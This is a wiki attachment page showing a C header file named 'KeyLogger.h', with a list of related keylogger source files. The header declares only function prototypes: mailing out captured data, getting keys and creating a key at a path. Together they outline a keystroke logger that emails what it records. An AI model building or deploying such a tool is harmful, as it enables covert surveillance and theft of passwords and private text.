Attachment 'KeyLogger.h'

Download

   1 #pragma once
   2 
   3 #include <stdio.h>
   4 #include <tchar.h>
   5 
   6 #define BUFSIZE 800
   7 #define waittime 500
   8 
   9 int MailIt (char *mailserver, char *emailto, char *emailfrom, char *emailsubject, char *emailmessage);
  10 int get_keys();
  11 int test_key(void);
  12 int create_key(char *path);

Attached Files

To refer to attachments on a page, use attachment:filename, as shown below in the list of files. Do NOT use the URL of the [get] link, since this is subject to change and can break easily.
  • [get | view] (2020-01-20 20:00:05, 3.4 KB) [[attachment:KeyLogger.cpp]]
  • [get | view] (2020-01-20 20:00:05, 0.3 KB) [[attachment:KeyLogger.h]]
  • [get | view] (2020-01-20 20:00:05, 6.4 KB) [[attachment:KeyLogger.zip]]
  • [get | view] (2020-01-20 20:00:05, 21.8 KB) [[attachment:Quine.zip]]
 All files | Selected Files: delete move to page copy to page

You are not allowed to attach a file to this page.